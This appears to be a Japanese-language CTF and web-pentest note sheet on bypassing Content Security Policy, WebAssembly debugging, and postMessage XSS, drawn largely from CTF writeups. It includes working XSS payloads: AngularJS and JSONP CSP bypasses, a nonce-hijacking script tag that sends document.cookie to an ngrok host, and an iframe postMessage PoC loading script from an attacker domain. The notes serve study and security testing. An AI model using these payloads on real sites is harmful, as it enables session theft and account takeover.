    • ajax.googleapis.comが使える。こういった時は外部ライブラリを踏み台にしてバイパスする
    • Angular.js
      • 直後にng-app属性を持ったpタグを入れることで、内部のjsコードを即座に実行してくれる html <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js"></script> <p ng-app>{{constructor.constructor('ここに任意コード')()}}
      • XSS in the AWS Console
        • <input ng-focus=$event.view.alert('XSS')>
  • script-src 'self' *.google.com *.gstatic.com;
    • <script src="https://accounts.google.com/o/oauth2/revoke?callback=[jscode]
    • payload: <script src="https://accounts.google.com/o/oauth2/revoke?callback=alert(31337)"></script>
  • script-src: strict-dynamic
    • この設定がされていると、正しいnonceを持ったscriptタグ内部で動的に作ったスクリプトは動く
    • よって、scriptタグ内部で動的にスクリプトが作れないかを探す
      • SECCON beginners CTF 2020 web問 writeup - 空地
    • 反射型XSSとDOM-based XSSの合わせ技
  • "script-src":"'self' 'unsafe-inline'"
    • インライン JavaScript および CSS を許可します
    • 普通に<script>sendMyDataToEvilDotCom();</script>が許可される
  • script-src 'none'
    • scriptタグは全く使えない
  • style-src 'self' http://cdn.embedly.com/;
    • CSSを外部からインジェクションできるようになる。この場合は、selfかhttp://cdn.embedly.com/ならCSSを外部から入れれる
    • ctf/2021/dice_ctf/build_a_better_panel at master · qxxxb/ctf · GitHub
      • この問題では特殊でhttp://cdn.embedly.com/にXSS的脆弱性があり、CSSを注入できるようになっていた
  • script-src 'nonce-*'
    • CTFtime.org / ångstromCTF 2021 / nomnomnom html This score was set by ${name} <script nonce='${nonce}'>
      • firefoxに限り、上記の様にscriptタグの直前に入力値を入れられる場合にnonceを取り込んだscriptタグを生成できる
        • <script src="data:, location.replace('http://[redacted: 12 chars].ngrok.io/?d=' + document.cookie);"
        • <script src="https://textbin.net/raw/o4tst0cpr6" dummy=\
        • 上記のような不完全なscriptタグを用意することでnonceを取り込める
  • script-src 'self'
    • SECCON Beginners CTF 2021【Web】magic 作問者writeup | Hi120kiのメモ
    • サイト自身のドメインからsrcで持ってきたJavaScriptだけ実行する
    • JSONPか、入力をそのまま出力しているような所があれば、そこ経由でJavaScriptを実行可能
• default-src 'self'
  • サイト管理者が、すべてのコンテンツをサイト自身のドメイン (サブドメインを除く) から取得させたい場合に設定する。自分のドメインからのjsしか受け付けない。
  • こういう場合は、jsファイルとかsvgファイルとかをアップロードして、それを指定することで実行させる
  • 指定のないもののデフォルト値として動く。
• Content Security Policy Level 3におけるXSS対策 - pixiv inside
• 信頼されたほかのjsコードを経由することでバイパス実行する方法がある
  • JSONP csp-evaluator/jsonp.js at master · google/csp-evaluator · GitHub
  • Angular csp-evaluator/angular.js at master · google/csp-evaluator · GitHub
    • scriptSrc: ["'self'", "'unsafe-eval'", "https://cdnjs.cloudflare.com/"],となっていれば、 html <script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.1.5/angular.min.js"></script> <p ng-app>{{constructor.constructor('fetch("/alien").then(r=>r.text()).then(t=>location="MY_URL?q="+escape(t.slice(754, 854)))')()}}
  • H5SC Minichallenge 3: "Sh*t, it's CSP!" · cure53/XSSChallengeWiki Wiki · GitHub
• 突破できなかったやつ
  • content-security-policy: default-src 'none'; style-src 'nonce-$nonce'; script-src 'nonce-$nonce'
• strict-dynamic
  • すでに実行を許可されたJavaScriptコードから読み込まれたJavaScriptコードを実行可能にする
  • JSONPを実行するために追加しているかもしれない
• 回避例
  • PayPalでDOMPolyglotXSSを簡単に見つける| PortSwigger Research
• CSP Policy Injection
  • 入力がCSPのポリシーに組み込まれる場合に、設定されていないCSP Policyを追加で設定できる
  • 同じポリシーを設定した場合は、Chromeであればエラーとなる
  • ; script-src-attr 'unsafe-inline'という感じにインジェクションする
• CSP Embedded Enforcement
  • とそれを利用したサイドチャネル攻撃
    • https://graneed.hatenablog.com/entry/2021/08/09/115452
    • https://st98.github.io/diary/posts/2020-12-10-pbctf-2020.html#web-443-xsp-3-solves
• CSPの影響を受けないもの（ほんとか？）
  • <meta http-equiv="refresh" content="0; URL={{遷移先}}> metaタグによる遷移
  • <link rel="preload" href="https://webhook.site/…" as="fetch">による読み込み

WebAssembly

ブラウザからWebAssemblyをデバッグする方法

• Debugging WebAssembly with modern tools - Chrome Developers
  • setup
    1. https://goo.gle/wasm-debugging-extensionをいれる
    2. Chrome DevToolsを開いて、歯車→Experiments→WebAssembly Debugging: Enable DWARF supportを有効にする
    3. 設定を閉じると、リロードしますか？と聞かれるので閉じる
    4. Sourceパネルを開いて適当にブレークすれば出てくる
  • 解析例
    • 適当にブレークする
    • Localをみればローカル変数の中身が見れる
    • Moduleの$memoryのbufferを見れば、ポインタ指定されていれば中身が見れる
    • ブレーク中は変数にカーソルを当てると中身が見れる
• UTCTF 2020 writeup - Wasm Fans Only - こんとろーるしーこんとろーるぶい

C言語に直すには

• 参考
  • picoCTF2021 [Web Exploitation] writeup - 好奇心の足跡
• 手順
  1. wasm2cでコンパイル
  2. ghidraでデコンパイル

解析例

CTFtime.org / UIUCTF 2020 / nookstop 2.0 / Writeup CTFtime.org / UTCTF 2021 / It's wasm time - UTCTF 2020 writeup - Wasm Fans Only - こんとろーるしーこんとろーるぶい - Chrome Developer Toolで動的解析できるみたい - WebAssemblyちょっとやる - バランスを取りたい

PostMessage

• PostMessageを使えばiframe間のCrossSite通信が通るので、注意しないといけないという話
• hackerone
  • $20000 Facebook DOM XSS : Vinoth Kumar
    • PostMessageでurlを渡して開いている部分があったから、javescript:にしたらXSSできた
• todo: 対策
  • オリジンを確認する必要がある
• GitHub - opnsec/postMessage-logger: Simple "postMessage logger" Chrome extension
  • postMessageをロギングしてくれるGoogle Chrome拡張
• Stealing tokens, emails, files and more in Microsoft Teams through malicious tabs | by Evan Grant | Tenable TechBlog | Jun, 2021 | Medium
  • いい攻撃コードが載っている。攻撃対象となるサイトをiframeで開いてpostMessageして、receiveして情報を抜き取る。
• postMessage issues · EdOverflow/bugbountywiki Wiki
• ペンテスト手法
  • postMessage XSS on a million sites | Detectify Labs
    • window.postMessage("hello", "*")"で何か引っかかってこないか見てみる。
    • 実行先でDOM XSSがないかを探す
    • PoCを作るときはiframeを使えばいい html <iframe id="frame" src="https://targetpage/using_addthis"></iframe> <script> document.getElementById("frame").postMessage('at-share-bookmarklet://ATTACKERDOMAIN/xss.js', '*'); </script>
  • The pitfalls of postMessage | Detectify Labs
    • 逆にlistenerを作って情報を抜き出す方法も紹介されている
  • Chrome Devtoolsを開いてSourcesのGlobal Listenersでリスナーが見られる